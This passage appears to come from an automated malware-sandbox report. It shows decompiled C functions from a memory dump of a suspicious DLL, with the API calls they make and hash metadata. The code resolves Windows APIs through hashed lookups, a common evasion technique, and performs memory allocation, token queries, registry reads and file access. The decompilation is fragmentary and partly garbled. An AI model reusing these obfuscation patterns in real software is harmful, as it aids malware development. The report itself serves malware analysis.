				_t5 = E6E84306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e842234
0x6e842238
0x6e842254
0x6e842257
0x6e84223a
0x6e842249
0x6e84224c
0x6e84224c
0x6e842267
0x6e84226c
0x6e842270
0x6e842278
0x6e842278
0x6e84227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E834B17,00000000,00000000,?), ref: 6E842278

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 713c247e270843a7aee20e13b2843b470b548417f40b8daddb1f68f57c94e577
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 6EE065B024E316EEE744966C9C04B6BB6D8EF84610F208E2CB468D71C4EA7498418361

Uniqueness

Uniqueness Score: -1.00%

Function 6E842820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E842820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E84306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e842827
0x6e842830
0x6e84283e
0x6e842861
0x6e842861
0x6e842840
0x6e842857
0x6e84285b
0x00000000
0x6e84285d
0x6e84285d
0x6e84285d
0x6e84285b
0x6e842866

APIs

NtAllocateVirtualMemory.NTDLL(6E8488E6,?,00000000,000000FF,6E8488E6,6E8488E6,60A28C5C,60A28C5C,?,?,6E8488E6,00003000,00000004,000000FF), ref: 6E842857

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: 4fde00259c3fb5707fb54316b7a226f12cbd1a276c41234e5a6ca2f866214c18
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 6DE0397120D346EFEB09CA99CC24E6FB7E9EF84604F108C2DB4A4D7250D734D8009721

Uniqueness

Uniqueness Score: -1.00%

Function 6E843138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E843138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E8434B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e843138
0x6e84313d
0x6e84313f
0x6e843141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E8434B0,6E843128,60A28C5C,60A28C5C,?,6E836C99,00000000), ref: 6E84313F

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: ba50f04dc2b67c76734666ccb4870af2083852b960897e05723f5a0ea27a08c0
Instruction ID: e065c824e650cf3944c344f020dd8fa0b017eb84a69c168beda44a3624bc1cae
Opcode Fuzzy Hash: ba50f04dc2b67c76734666ccb4870af2083852b960897e05723f5a0ea27a08c0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E8410A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E8410A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6E84306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6E83C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6E83BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6E84306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6E83F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6E83F4BC(_t59, 0);
					_t34 = E6E84306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6e8410b3
0x6e8410b5
0x6e8410c4
0x6e8410c8
0x6e8410d2
0x6e8410d2
0x6e8410d8
0x6e8410db
0x6e8410dd
0x6e8410e8
0x6e841122
0x6e841127
0x6e84112c
0x6e84112c
0x00000000
0x6e841131
0x6e8410f4
0x6e841107
0x6e841118
0x6e841118
0x6e84111a
0x6e841120
0x6e84113e
0x6e841145
0x6e84114e
0x6e84115c
0x6e841165
0x6e841168
0x6e84116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E841118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E84117B

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: d2200f9adf5f013f33f2ac2436be1a18cd342446011aa3ae1ebefcf3ff2ebf2d
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction Fuzzy Hash: 0741F37028426AEFF756D6EDD860BAF76D8DB95300F208C28A560CA1D4DB20CC59C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E8457B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E8457B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E843064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E83F828(_a8, _t15);
							if(E6E843064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E83F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e8457b8
0x6e8457b9
0x6e8457bb
0x6e8457c0
0x6e8457c7
0x6e8457cb
0x6e8457cb
0x6e8457cb
0x6e8457cf
0x6e845815
0x6e845815
0x6e8457d1
0x6e8457d1
0x6e8457d7
0x6e8457e0
0x6e8457e3
0x6e8457fa
0x6e84580b
0x6e84580b
0x6e84580d
0x6e845813
0x6e84581e
0x6e845836
0x6e845856
0x6e845856
0x6e845858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8457d7
0x6e845860

APIs

RegQueryValueExA.KERNELBASE(?,6E84D1F8,00000000,?,00000000,00000000,?,?,?,6E84D1F8,?,6E845887,?,00000000,00000000), ref: 6E84580B
RegQueryValueExA.KERNELBASE(?,6E84D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E84D1F8,?,6E845887,?,00000000), ref: 6E845856

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 641231e112730d91e43df68e25035de518eae8f18b67e5dd48cad9a4f0d583d5
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: 0711723120930DEBD751DBA99C90EAFBBDCEF46754F108D2DB49497185EB21E900CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E845B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E845B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E83D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E83D6D0(__ecx, _t60);
					E6E83CFF8(_t56,  *_t60);
					E6E83CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E8462B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E843064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E83C26C(_t40);
					if(E6E83C280(_t40) != 0) {
						_t56[2] = E6E8435F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E843064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E843698(_t59, 0xff, 8);
						if(E6E843064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e845b43
0x6e845b45
0x6e845b52
0x6e845b56
0x6e845b5a
0x6e845b64
0x6e845b6b
0x6e845b6b
0x6e845b72
0x6e845b74
0x6e845b79
0x6e845b82
0x6e845b8a
0x6e845b8a
0x6e845b7b
0x6e845b7d
0x6e845b7d
0x6e845b79
0x6e845b8f
0x6e845b9b
0x6e845ccc
0x6e845c09
0x6e845c12
0x6e845c13
0x6e845c18
0x6e845c19
0x6e845c0b
0x6e845c0d
0x6e845c0d
0x6e845c2f
0x6e845c43
0x6e845c31
0x6e845c3e
0x6e845c40
0x6e845c40
0x6e845c45
0x6e845c4a
0x6e845c58
0x6e845cc3
0x00000000
0x6e845c5a
0x6e845c5f
0x6e845cac
0x6e845cae
0x6e845cb0
0x6e845cba
0x6e845cba
0x6e845cb0
0x6e845c61
0x6e845c6d
0x6e845c86
0x6e845c88
0x6e845c89
0x6e845c8a
0x6e845c8c
0x6e845c8e
0x6e845c8f
0x6e845c8f
0x00000000
0x6e845c92
0x6e845ba1
0x6e845bb1
0x6e845bb1

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8360c66f8cbd58928adbcc93d422098bfc7251ae38d0f6e526a0bb9297095bfc
Instruction ID: da34ddf177cf9fb3da54de06f58177229fb1ab7f482a34258db8766450218202
Opcode Fuzzy Hash: 8360c66f8cbd58928adbcc93d422098bfc7251ae38d0f6e526a0bb9297095bfc
Instruction Fuzzy Hash: 0431203028431EFFEB506BF98D88F6F729DDF81648F104C38FA019A1C6EB619914C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E841166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E841166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6e841168
0x6e84116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E84117B

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: 9b798aeae1154d6ed1efbc4be4d964a037681d3faffb84e1a055af8a64282198
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: A0110A705042ABDFFB56C5E898B0BAF7658DF82700F204C65E870D60E4DB24CC69C662

Uniqueness

Uniqueness Score: -1.00%

Function 6E845BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E845BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E843064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E83C26C(_t24);
				if(E6E83C280(_t24) != 0) {
					_t34[2] = E6E8435F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E843064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E843698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E843064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e845bbd
0x6e845bc1
0x6e845bc4
0x6e845bc7
0x6e845c09
0x6e845c12
0x6e845c18
0x6e845c19
0x6e845c0b
0x6e845c0d
0x6e845c0d
0x6e845c2f
0x6e845c43
0x6e845c31
0x6e845c3e
0x6e845c40
0x6e845c40
0x6e845c45
0x6e845c4a
0x6e845c58
0x6e845cc3
0x6e845cc6
0x6e845c5a
0x6e845c5f
0x6e845cac
0x6e845cb0
0x6e845cba
0x6e845cba
0x6e845cb0
0x6e845c61
0x6e845c6d
0x6e845c72
0x6e845c86
0x6e845c88
0x6e845c89
0x6e845c8a
0x6e845c8c
0x6e845c8e
0x6e845c8f
0x6e845c8f
0x6e845c92
0x6e845c92
0x6e845c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E845C3E

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: 73a27d3f98099ad634b7e02f62ba694c8caa9064aa522b994ecdd7693c6683c6
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: F8010C3128030EFBFA6027E98C04F7E728CCF82698F108C31BA01A91C5EA12A8598120

Uniqueness

Uniqueness Score: -1.00%

Function 6E845BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E845BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E843064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E83C26C(_t24);
					if(E6E83C280(_t24) != 0) {
						_t33[2] = E6E8435F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E843064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E843698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E843064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e845be5
0x6e845be7
0x6e845bfe
0x6e845c09
0x6e845c12
0x6e845c18
0x6e845c19
0x6e845c0b
0x6e845c0d
0x6e845c0d
0x6e845c2f
0x6e845c43
0x6e845c31
0x6e845c3e
0x6e845c40
0x6e845c40
0x6e845c45
0x6e845c4a
0x6e845c58
0x6e845cc3
0x6e845cc6
0x6e845c5a
0x6e845c5f
0x6e845cac
0x6e845cb0
0x6e845cba
0x6e845cba
0x6e845cb0
0x6e845c61
0x6e845c6d
0x6e845c72
0x6e845c86
0x6e845c88
0x6e845c89
0x6e845c8a
0x6e845c8c
0x6e845c8e
0x6e845c8f
0x6e845c8f
0x6e845c92
0x6e845c92
0x6e845be9
0x6e845be9
0x6e845bf0
0x6e845bf0
0x6e845c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E845C3E

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: cdc9ac17d3c9c8e077236becaa31e8789b5f85626c5aa349b41043cdf4531aa3
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: D401223128430EFFFB9067E98C44F6F774DDB8264CF108C35BA01A51C5DB22A958C260

Uniqueness

Uniqueness Score: -1.00%

Function 6E845BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E845BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E843064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E83C26C(_t24);
				if(E6E83C280(_t24) != 0) {
					_t34[2] = E6E8435F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E843064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E843698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E843064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e845bd1
0x6e845bd8
0x6e845bdb
0x6e845c09
0x6e845c12
0x6e845c18
0x6e845c19
0x6e845c0b
0x6e845c0d
0x6e845c0d
0x6e845c2f
0x6e845c43
0x6e845c31
0x6e845c3e
0x6e845c40
0x6e845c40
0x6e845c45
0x6e845c4a
0x6e845c58
0x6e845cc3
0x6e845cc6
0x6e845c5a
0x6e845c5f
0x6e845cac
0x6e845cb0
0x6e845cba
0x6e845cba
0x6e845cb0
0x6e845c61
0x6e845c6d
0x6e845c72
0x6e845c86
0x6e845c88
0x6e845c89
0x6e845c8a
0x6e845c8c
0x6e845c8e
0x6e845c8f
0x6e845c8f
0x6e845c92
0x6e845c92
0x6e845c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E845C3E

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 558a466bf37834c7fac6f72a38dc125d2b9bb0037742053293e687f9c28499fb
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 0A01F53528031EFFF75067E98D44F7F724DDB82658F104C35BA01951C5EE266958C161

Uniqueness

Uniqueness Score: -1.00%

Function 6E845BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E845BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E843064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E83C26C(_t23);
				if(E6E83C280(_t23) != 0) {
					_t31[2] = E6E8435F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E843064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E843698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E843064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e845bb3
0x6e845bba
0x6e845c09
0x6e845c12
0x6e845c18
0x6e845c19
0x6e845c0b
0x6e845c0d
0x6e845c0d
0x6e845c2f
0x6e845c43
0x6e845c31
0x6e845c3e
0x6e845c40
0x6e845c40
0x6e845c45
0x6e845c4a
0x6e845c58
0x6e845cc3
0x6e845cc6
0x6e845c5a
0x6e845c5f
0x6e845cac
0x6e845cb0
0x6e845cba
0x6e845cba
0x6e845cb0
0x6e845c61
0x6e845c6d
0x6e845c72
0x6e845c86
0x6e845c88
0x6e845c89
0x6e845c8a
0x6e845c8c
0x6e845c8e
0x6e845c8f
0x6e845c8f
0x6e845c92
